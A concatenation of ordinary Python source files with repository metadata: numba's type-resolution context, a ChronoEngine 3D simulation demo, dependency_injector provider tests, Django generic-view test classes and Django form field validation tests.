ty = typeof(val, Purpose.constant)
except ValueError as e:
# Make sure the exception doesn't hold a reference to the user
# value.
typeof_exc = utils.erase_traceback(e)
else:
return ty
if isinstance(val, types.ExternalFunction):
return val
# Try to look up target specific typing information
ty = self._get_global_type(val)
if ty is not None:
return ty
raise typeof_exc
def resolve_value_type_prefer_literal(self, value):
"""Resolve value type and prefer Literal types whenever possible.
"""
lit = types.maybe_literal(value)
if lit is None:
return self.resolve_value_type(value)
else:
return lit
def _get_global_type(self, gv):
ty = self._lookup_global(gv)
if ty is not None:
return ty
if isinstance(gv, pytypes.ModuleType):
return types.Module(gv)
def _load_builtins(self):
# Initialize declarations
from numba.core.typing import builtins, arraydecl, npdatetime # noqa: F401, E501
from numba.core.typing import ctypes_utils, bufproto # noqa: F401, E501
from numba.core.unsafe import eh # noqa: F401
self.install_registry(templates.builtin_registry)
def load_additional_registries(self):
"""
Load target-specific registries. Can be overridden by subclasses.
"""
def install_registry(self, registry):
"""
Install a *registry* (a templates.Registry instance) of function,
attribute and global declarations.
"""
try:
loader = self._registries[registry]
except KeyError:
loader = templates.RegistryLoader(registry)
self._registries[registry] = loader
for ftcls in loader.new_registrations('functions'):
self.insert_function(ftcls(self))
for ftcls in loader.new_registrations('attributes'):
self.insert_attributes(ftcls(self))
for gv, gty in loader.new_registrations('globals'):
existing = self._lookup_global(gv)
if existing is None:
self.insert_global(gv, gty)
else:
# A type was already inserted, see if we can add to it
newty = existing.augment(gty)
if newty is None:
raise TypeError("cannot augment %s with %s"
% (existing, gty))
self._remove_global(gv)
self._insert_global(gv, newty)
def _lookup_global(self, gv):
"""
Look up the registered type for global value *gv*.
"""
try:
gv = weakref.ref(gv)
except TypeError:
pass
try:
return self._globals.get(gv, None)
except TypeError:
# Unhashable type
return None
def _insert_global(self, gv, gty):
"""
Register type *gty* for value *gv*. Only a weak reference
to *gv* is kept, if possible.
"""
def on_disposal(wr, pop=self._globals.pop):
# pop() is pre-looked up to avoid a crash late at shutdown on 3.5
# (https://bugs.python.org/issue25217)
pop(wr)
try:
gv = weakref.ref(gv, on_disposal)
except TypeError:
pass
self._globals[gv] = gty
def _remove_global(self, gv):
"""
Remove the registered type for global value *gv*.
"""
try:
gv = weakref.ref(gv)
except TypeError:
pass
del self._globals[gv]
def insert_global(self, gv, gty):
self._insert_global(gv, gty)
def insert_attributes(self, at):
key = at.key
self._attributes[key].append(at)
def insert_function(self, ft):
key = ft.key
self._functions[key].append(ft)
def insert_user_function(self, fn, ft):
"""Insert a user function.
Args
----
- fn:
object used as callee
- ft:
function template
"""
self._insert_global(fn, types.Function(ft))
def can_convert(self, fromty, toty):
"""
Check whether conversion is possible from *fromty* to *toty*.
If successful, return a numba.typeconv.Conversion instance;
otherwise None is returned.
"""
if fromty == toty:
return Conversion.exact
else:
# First check with the type manager (some rules are registered
# at startup there, see numba.typeconv.rules)
conv = self.tm.check_compatible(fromty, toty)
if conv is not None:
return conv
# Fall back on type-specific rules
forward = fromty.can_convert_to(self, toty)
backward = toty.can_convert_from(self, fromty)
if backward is None:
return forward
elif forward is None:
return backward
else:
return min(forward, backward)
def _rate_arguments(self, actualargs, formalargs, unsafe_casting=True,
exact_match_required=False):
"""
Rate the actual arguments for compatibility against the formal
arguments. A Rating instance is returned, or None if incompatible.
"""
if len(actualargs) != len(formalargs):
return None
rate = Rating()
for actual, formal in zip(actualargs, formalargs):
conv = self.can_convert(actual, formal)
if conv is None:
return None
elif not unsafe_casting and conv >= Conversion.unsafe:
return None
elif exact_match_required and conv != Conversion.exact:
return None
if conv == Conversion.promote:
rate.promote += 1
elif conv == Conversion.safe:
rate.safe_convert += 1
elif conv == Conversion.unsafe:
rate.unsafe_convert += 1
elif conv == Conversion.exact:
pass
else:
raise Exception("unreachable", conv)
return rate
def install_possible_conversions(self, actualargs, formalargs):
"""
Install possible conversions from the actual argument types to
the formal argument types in the C++ type manager.
Return True if all arguments can be converted.
"""
if len(actualargs) != len(formalargs):
return False
for actual, formal in zip(actualargs, formalargs):
if self.tm.check_compatible(actual, formal) is not None:
# This conversion is already known
continue
conv = self.can_convert(actual, formal)
if conv is None:
return False
assert conv is not Conversion.exact
self.tm.set_compatible(actual, formal, conv)
return True
def resolve_overload(self, key, cases, args, kws,
allow_ambiguous=True, unsafe_casting=True,
exact_match_required=False):
"""
Given actual *args* and *kws*, find the best matching
signature in *cases*, or None if none matches.
*key* is used for error reporting purposes.
If *allow_ambiguous* is False, a tie in the best matches
will raise an error.
If *unsafe_casting* is False, unsafe casting is forbidden.
"""
assert not kws, "Keyword arguments are not supported, yet"
options = {
'unsafe_casting': unsafe_casting,
'exact_match_required': exact_match_required,
}
# Rate each case
candidates = []
for case in cases:
if len(args) == len(case.args):
rating = self._rate_arguments(args, case.args, **options)
if rating is not None:
candidates.append((rating.astuple(), case))
# Find the best case
candidates.sort(key=lambda i: i[0])
if candidates:
best_rate, best = candidates[0]
if not allow_ambiguous:
# Find whether there is a tie and if so, raise an error
tied = []
for rate, case in candidates:
if rate != best_rate:
break
tied.append(case)
if len(tied) > 1:
args = (key, args, '\n'.join(map(str, tied)))
msg = "Ambiguous overloading for %s %s:\n%s" % args
raise TypeError(msg)
# Simply return the best matching candidate in order.
# If there is a tie, since list.sort() is stable, the first case
# in the original order is returned.
# (this can happen if e.g. a function template exposes
# (int32, int32) -> int32 and (int64, int64) -> int64,
# and you call it with (int16, int16) arguments)
return best
def unify_types(self, *typelist):
# Sort the type list according to bit width before doing
# pairwise unification (with thanks to aterrel).
def keyfunc(obj):
"""Uses bitwidth to order numeric-types.
            Falls back to a stable, deterministic sort.
"""
return getattr(obj, 'bitwidth', 0)
typelist = sorted(typelist, key=keyfunc)
unified = typelist[0]
for tp in typelist[1:]:
unified = self.unify_pairs(unified, tp)
if unified is None:
break
return unified
def unify_pairs(self, first, second):
"""
Try to unify the two given types. A third type is returned,
or None in case of failure.
"""
if first == second:
return first
if first is types.undefined:
return second
elif second is types.undefined:
return first
# Types with special unification rules
unified = first.unify(self, second)
if unified is not None:
return unified
unified = second.unify(self, first)
if unified is not None:
return unified
# Other types with simple conversion rules
conv = self.can_convert(fromty=first, toty=second)
if conv is not None and conv <= Conversion.safe:
# Can convert from first to second
return second
conv = self.can_convert(fromty=second, toty=first)
if conv is not None and conv <= Conversion.safe:
# Can convert from second to first
return first
if isinstance(first, types.Literal) or \
isinstance(second, types.Literal):
first = types.unliteral(first)
second = types.unliteral(second)
return self.unify_pairs(first, second)
# Cannot unify
return None
class Context(BaseContext):
def load_additional_registries(self):
from . import (
cffi_utils,
cmathdecl,
enumdecl,
listdecl,
mathdecl,
npydecl,
randomdecl,
setdecl,
dictdecl,
)
self.install_registry(cffi_utils.registry)
self.install_registry(cmathdecl.registry)
self.install_registry(enumdecl.registry)
self.install_registry(listdecl.registry)
self.install_registry(mathdecl.registry)
self.install_registry(npydecl.registry)
self.install_registry(randomdecl.registry)
self.install_registry(setdecl.registry)
self.install_registry(dictdecl.registry)
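

# --- Illustrative sketch (editor's addition, not part of numba) ---
# resolve_overload() above sorts candidate signatures by Rating.astuple(), i.e. by
# (unsafe_convert, safe_convert, promote), so a signature needing fewer unsafe
# conversions always beats one needing more, with safe conversions and promotions
# acting as tie-breakers. The standalone snippet below reproduces that ordering
# using the Rating class defined in this module.
def _sketch_rating_order():
    exact, promoted, unsafe = Rating(), Rating(), Rating()
    promoted.promote = 1
    unsafe.unsafe_convert = 1
    ranked = sorted([unsafe, promoted, exact], key=lambda r: r.astuple())
    # Exact match first, then the promotion, then the unsafe conversion:
    # [(0, 0, 0), (0, 0, 1), (1, 0, 0)]
    return [r.astuple() for r in ranked]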
|
seibert/numba
|
numba/core/typing/context.py
|
Python
|
bsd-2-clause
| 24,612
|
#-------------------------------------------------------------------------------
# Name: modulo1
# Purpose:
#
# Author: tasora
#
# Created: 14/02/2012
# Copyright: (c) tasora 2012
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
def main():
pass
if __name__ == '__main__':
main()
import os
import math
import ChronoEngine_PYTHON_core as chrono
import ChronoEngine_PYTHON_postprocess as postprocess
import ChronoEngine_PYTHON_irrlicht as chronoirr
print ("Example: create a system and visualize it in realtime 3D");
# ---------------------------------------------------------------------
#
# Create the simulation system and add items
#
mysystem = chrono.ChSystem()
# Create a fixed rigid body
mbody1 = chrono.ChBodyShared()
mbody1.SetBodyFixed(True)
mbody1.SetPos( chrono.ChVectorD(0,0,-0.2))
mysystem.Add(mbody1)
mboxasset = chrono.ChBoxShapeShared()
mboxasset.GetBoxGeometry().Size = chrono.ChVectorD(0.2,0.5,0.1)
mbody1.AddAsset(mboxasset)
# Create a swinging rigid body
mbody2 = chrono.ChBodyShared()
mbody2.SetBodyFixed(False)
mysystem.Add(mbody2)
mboxasset = chrono.ChBoxShapeShared()
mboxasset.GetBoxGeometry().Size = chrono.ChVectorD(0.2,0.5,0.1)
mbody2.AddAsset(mboxasset)
mboxtexture = chrono.ChTextureShared()
mboxtexture.SetTextureFilename('../data/concrete.jpg')
mbody2.GetAssets().push_back(mboxtexture)
# Create a revolute constraint
mlink = chrono.ChLinkRevoluteShared()
# the coordinate system of the constraint reference in abs. space:
mframe = chrono.ChFrameD(chrono.ChVectorD(0.1,0.5,0))
# initialize the constraint, telling which parts must be connected, and where:
mlink.Initialize(mbody1,mbody2, mframe)
mysystem.Add(mlink)
# ---------------------------------------------------------------------
#
# Create an Irrlicht application to visualize the system
#
myapplication = chronoirr.ChIrrApp(mysystem)
myapplication.AddTypicalSky('../data/skybox/')
myapplication.AddTypicalCamera(chronoirr.vector3df(0.6,0.6,0.8))
myapplication.AddTypicalLights()
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need finer control over which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem); on a per-item basis.
myapplication.AssetBindAll();
# ==IMPORTANT!== Use this function to 'convert' the assets that you added to the
# bodies into Irrlicht meshes, so that they can be visualized by Irrlicht!
myapplication.AssetUpdateAll();
# ---------------------------------------------------------------------
#
# Run the simulation
#
myapplication.SetTimestep(0.001)
while(myapplication.GetDevice().run()):
myapplication.BeginScene()
myapplication.DrawAll()
myapplication.DoStep()
myapplication.EndScene()
|
Bryan-Peterson/chrono
|
src/demos/python/demo_irrlicht.py
|
Python
|
bsd-3-clause
| 2,990
|
"""DelegatedCallable provider tests."""
from dependency_injector import providers
from .common import example
def test_inheritance():
assert isinstance(providers.DelegatedCallable(example), providers.Callable)
def test_is_provider():
assert providers.is_provider(providers.DelegatedCallable(example)) is True
def test_is_delegated_provider():
provider = providers.DelegatedCallable(example)
assert providers.is_delegated(provider) is True
def test_repr():
provider = providers.DelegatedCallable(example)
assert repr(provider) == (
"<dependency_injector.providers."
"DelegatedCallable({0}) at {1}>".format(repr(example), hex(id(provider)))
)
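

# --- Illustrative sketch (editor's addition, not part of the upstream test suite) ---
# The point of a DelegatedCallable is that, when used as an injection, the provider
# itself is injected rather than the result of calling it. The sketch below contrasts
# the two; the helper callables are made up for illustration, and the expected values
# in the comments are assumptions based on the documented "injected as is" semantics.
def _sketch_delegated_injection():
    def make_config():
        return {"answer": 42}

    def consumer(dependency):
        return dependency

    eager = providers.Factory(consumer, dependency=providers.Callable(make_config))
    lazy = providers.Factory(consumer, dependency=providers.DelegatedCallable(make_config))

    eager()   # -> {"answer": 42}: the Callable was invoked and its result injected.
    lazy()    # -> the DelegatedCallable provider object itself.
    lazy()()  # -> {"answer": 42}: calling the injected provider invokes make_config.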
|
ets-labs/python-dependency-injector
|
tests/unit/providers/callables/test_delegated_callable_py2_py3.py
|
Python
|
bsd-3-clause
| 695
|
from __future__ import unicode_literals
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse, reverse_lazy
from django.utils.decorators import method_decorator
from django.views import generic
from .test_forms import AuthorForm, ContactForm
from .models import Artist, Author, Book, Page, BookSigning
class CustomTemplateView(generic.TemplateView):
template_name = 'generic_views/about.html'
def get_context_data(self, **kwargs):
context = super(CustomTemplateView, self).get_context_data(**kwargs)
context.update({'key': 'value'})
return context
class ObjectDetail(generic.DetailView):
template_name = 'generic_views/detail.html'
def get_object(self):
return {'foo': 'bar'}
class ArtistDetail(generic.DetailView):
queryset = Artist.objects.all()
class AuthorDetail(generic.DetailView):
queryset = Author.objects.all()
class PageDetail(generic.DetailView):
queryset = Page.objects.all()
template_name_field = 'template'
class DictList(generic.ListView):
"""A ListView that doesn't use a model."""
queryset = [
{'first': 'John', 'last': 'Lennon'},
{'first': 'Yoko', 'last': 'Ono'}
]
template_name = 'generic_views/list.html'
class ArtistList(generic.ListView):
template_name = 'generic_views/list.html'
queryset = Artist.objects.all()
class AuthorList(generic.ListView):
queryset = Author.objects.all()
class CustomPaginator(Paginator):
def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
super(CustomPaginator, self).__init__(
queryset,
page_size,
orphans=2,
allow_empty_first_page=allow_empty_first_page)
class AuthorListCustomPaginator(AuthorList):
paginate_by = 5
def get_paginator(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
return super(AuthorListCustomPaginator, self).get_paginator(
queryset,
page_size,
orphans=2,
allow_empty_first_page=allow_empty_first_page)
class ContactView(generic.FormView):
form_class = ContactForm
success_url = reverse_lazy('authors_list')
template_name = 'generic_views/form.html'
class ArtistCreate(generic.CreateView):
model = Artist
fields = '__all__'
class NaiveAuthorCreate(generic.CreateView):
queryset = Author.objects.all()
fields = '__all__'
class TemplateResponseWithoutTemplate(generic.detail.SingleObjectTemplateResponseMixin, generic.View):
# we don't define the usual template_name here
def __init__(self):
        # Dummy object, but the attribute is required by get_template_names()
self.object = None
class AuthorCreate(generic.CreateView):
model = Author
success_url = '/list/authors/'
fields = '__all__'
class SpecializedAuthorCreate(generic.CreateView):
model = Author
form_class = AuthorForm
template_name = 'generic_views/form.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('author_detail', args=[self.object.id,])
class AuthorCreateRestricted(AuthorCreate):
post = method_decorator(login_required)(AuthorCreate.post)
class ArtistUpdate(generic.UpdateView):
model = Artist
fields = '__all__'
class NaiveAuthorUpdate(generic.UpdateView):
queryset = Author.objects.all()
fields = '__all__'
class AuthorUpdate(generic.UpdateView):
model = Author
success_url = '/list/authors/'
fields = '__all__'
class OneAuthorUpdate(generic.UpdateView):
success_url = '/list/authors/'
fields = '__all__'
def get_object(self):
return Author.objects.get(pk=1)
class SpecializedAuthorUpdate(generic.UpdateView):
model = Author
form_class = AuthorForm
template_name = 'generic_views/form.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('author_detail', args=[self.object.id,])
class NaiveAuthorDelete(generic.DeleteView):
queryset = Author.objects.all()
class AuthorDelete(generic.DeleteView):
model = Author
success_url = '/list/authors/'
class SpecializedAuthorDelete(generic.DeleteView):
queryset = Author.objects.all()
template_name = 'generic_views/confirm_delete.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('authors_list')
class BookConfig(object):
queryset = Book.objects.all()
date_field = 'pubdate'
class BookArchive(BookConfig, generic.ArchiveIndexView):
pass
class BookYearArchive(BookConfig, generic.YearArchiveView):
pass
class BookMonthArchive(BookConfig, generic.MonthArchiveView):
pass
class BookWeekArchive(BookConfig, generic.WeekArchiveView):
pass
class BookDayArchive(BookConfig, generic.DayArchiveView):
pass
class BookTodayArchive(BookConfig, generic.TodayArchiveView):
pass
class BookDetail(BookConfig, generic.DateDetailView):
pass
class AuthorGetQuerySetFormView(generic.edit.ModelFormMixin):
fields = '__all__'
def get_queryset(self):
return Author.objects.all()
class BookDetailGetObjectCustomQueryset(BookDetail):
def get_object(self, queryset=None):
return super(BookDetailGetObjectCustomQueryset,self).get_object(
queryset=Book.objects.filter(pk=2))
class CustomMultipleObjectMixinView(generic.list.MultipleObjectMixin, generic.View):
queryset = [
{'name': 'John'},
{'name': 'Yoko'},
]
def get(self, request):
self.object_list = self.get_queryset()
class CustomContextView(generic.detail.SingleObjectMixin, generic.View):
model = Book
object = Book(name='dummy')
def get_object(self):
return Book(name="dummy")
def get_context_data(self, **kwargs):
context = {'custom_key': 'custom_value'}
context.update(kwargs)
return super(CustomContextView, self).get_context_data(**context)
def get_context_object_name(self, obj):
return "test_name"
class CustomSingleObjectView(generic.detail.SingleObjectMixin, generic.View):
model = Book
object = Book(name="dummy")
class BookSigningConfig(object):
model = BookSigning
date_field = 'event_date'
# use the same templates as for books
def get_template_names(self):
return ['generic_views/book%s.html' % self.template_name_suffix]
class BookSigningArchive(BookSigningConfig, generic.ArchiveIndexView):
pass
class BookSigningYearArchive(BookSigningConfig, generic.YearArchiveView):
pass
class BookSigningMonthArchive(BookSigningConfig, generic.MonthArchiveView):
pass
class BookSigningWeekArchive(BookSigningConfig, generic.WeekArchiveView):
pass
class BookSigningDayArchive(BookSigningConfig, generic.DayArchiveView):
pass
class BookSigningTodayArchive(BookSigningConfig, generic.TodayArchiveView):
pass
class BookSigningDetail(BookSigningConfig, generic.DateDetailView):
context_object_name = 'book'
class NonModel(object):
id = "non_model_1"
_meta = None
class NonModelDetail(generic.DetailView):
template_name = 'generic_views/detail.html'
model = NonModel
def get_object(self, queryset=None):
return NonModel()
|
ZhaoCJ/django
|
tests/generic_views/views.py
|
Python
|
bsd-3-clause
| 7,341
|
# -*- coding: utf-8 -*-
"""
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
"""
from __future__ import unicode_literals
import datetime
import pickle
import re
import os
from decimal import Decimal
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import *
from django.test import SimpleTestCase
from django.utils import formats
from django.utils import six
from django.utils import translation
from django.utils._os import upath
def fix_os_paths(x):
if isinstance(x, six.string_types):
return x.replace('\\', '/')
elif isinstance(x, tuple):
return tuple(fix_os_paths(list(x)))
elif isinstance(x, list):
return [fix_os_paths(y) for y in x]
else:
return x
class FieldsTests(SimpleTestCase):
def assertWidgetRendersTo(self, field, to):
class _Form(Form):
f = field
self.assertHTMLEqual(str(_Form()['f']), to)
def test_field_sets_widget_is_required(self):
self.assertTrue(Field(required=True).widget.is_required)
self.assertFalse(Field(required=False).widget.is_required)
def test_cooperative_multiple_inheritance(self):
class A(object):
def __init__(self):
self.class_a_var = True
super(A, self).__init__()
class ComplexField(Field, A):
def __init__(self):
super(ComplexField, self).__init__()
f = ComplexField()
self.assertTrue(f.class_a_var)
# CharField ###################################################################
def test_charfield_1(self):
f = CharField()
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_2(self):
f = CharField(required=False)
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertEqual('', f.clean(None))
self.assertEqual('', f.clean(''))
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_3(self):
f = CharField(max_length=10, required=False)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 10 characters (it has 11).'", f.clean, '1234567890a')
self.assertEqual(f.max_length, 10)
self.assertEqual(f.min_length, None)
def test_charfield_4(self):
f = CharField(min_length=10, required=False)
self.assertEqual('', f.clean(''))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 5).'", f.clean, '12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_5(self):
f = CharField(min_length=10, required=True)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 5).'", f.clean, '12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_length_not_int(self):
"""
Ensure that setting min_length or max_length to something that is not a
number raises an exception.
"""
self.assertRaises(ValueError, CharField, min_length='a')
self.assertRaises(ValueError, CharField, max_length='a')
self.assertRaises(ValueError, CharField, 'a')
def test_charfield_widget_attrs(self):
"""
Ensure that CharField.widget_attrs() always returns a dictionary.
Refs #15912
"""
# Return an empty dictionary if max_length is None
f = CharField()
self.assertEqual(f.widget_attrs(TextInput()), {})
# Or if the widget is not TextInput or PasswordInput
f = CharField(max_length=10)
self.assertEqual(f.widget_attrs(HiddenInput()), {})
# Otherwise, return a maxlength attribute equal to max_length
self.assertEqual(f.widget_attrs(TextInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(PasswordInput()), {'maxlength': '10'})
# IntegerField ################################################################
def test_integerfield_1(self):
f = IntegerField()
self.assertWidgetRendersTo(f, '<input type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), int))
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(42, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 3.14)
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_2(self):
f = IntegerField(required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(1, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), int))
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_3(self):
f = IntegerField(max_value=10)
self.assertWidgetRendersTo(f, '<input max="10" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean(1))
self.assertEqual(10, f.clean(10))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, 11)
self.assertEqual(10, f.clean('10'))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, '11')
self.assertEqual(f.max_value, 10)
self.assertEqual(f.min_value, None)
def test_integerfield_4(self):
f = IntegerField(min_value=10)
self.assertWidgetRendersTo(f, '<input id="id_f" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, 10)
def test_integerfield_5(self):
f = IntegerField(min_value=10, max_value=20)
self.assertWidgetRendersTo(f, '<input id="id_f" max="20" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(20, f.clean(20))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 20.'", f.clean, 21)
self.assertEqual(f.max_value, 20)
self.assertEqual(f.min_value, 10)
def test_integerfield_localized(self):
"""
Make sure localized IntegerField's widget renders to a text input with
no number input specific attributes.
"""
f1 = IntegerField(localize=True)
self.assertWidgetRendersTo(f1, '<input id="id_f" name="f" type="text" />')
# FloatField ##################################################################
def test_floatfield_1(self):
f = FloatField()
self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), float))
self.assertEqual(23.0, f.clean('23'))
self.assertEqual(3.1400000000000001, f.clean('3.14'))
self.assertEqual(3.1400000000000001, f.clean(3.14))
self.assertEqual(42.0, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertEqual(1.0, f.clean('1.0 '))
self.assertEqual(1.0, f.clean(' 1.0'))
self.assertEqual(1.0, f.clean(' 1.0 '))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_2(self):
f = FloatField(required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(None))
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_3(self):
f = FloatField(max_value=1.5, min_value=0.5)
self.assertWidgetRendersTo(f, '<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'", f.clean, '0.4')
self.assertEqual(1.5, f.clean('1.5'))
self.assertEqual(0.5, f.clean('0.5'))
self.assertEqual(f.max_value, 1.5)
self.assertEqual(f.min_value, 0.5)
def test_floatfield_localized(self):
"""
Make sure localized FloatField's widget renders to a text input with
no number input specific attributes.
"""
f = FloatField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_floatfield_changed(self):
f = FloatField()
n = 4.35
self.assertFalse(f._has_changed(n, '4.3500'))
with translation.override('fr'):
with self.settings(USE_L10N=True):
f = FloatField(localize=True)
localized_n = formats.localize_input(n) # -> '4,35' in French
self.assertFalse(f._has_changed(n, localized_n))
# DecimalField ################################################################
def test_decimalfield_1(self):
f = DecimalField(max_digits=4, decimal_places=2)
self.assertWidgetRendersTo(f, '<input id="id_f" step="0.01" type="number" name="f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(True, isinstance(f.clean('1'), Decimal))
self.assertEqual(f.clean('23'), Decimal("23"))
self.assertEqual(f.clean('3.14'), Decimal("3.14"))
self.assertEqual(f.clean(3.14), Decimal("3.14"))
self.assertEqual(f.clean(Decimal('3.14')), Decimal("3.14"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'łąść')
self.assertEqual(f.clean('1.0 '), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0'), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0 '), Decimal("1.0"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '123.45')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '1.234')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 digits before the decimal point.'", f.clean, '123.4')
self.assertEqual(f.clean('-12.34'), Decimal("-12.34"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '-123.45')
self.assertEqual(f.clean('-.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-00.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-000.12'), Decimal("-0.12"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '-000.123')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '-000.12345')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '--0.12')
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
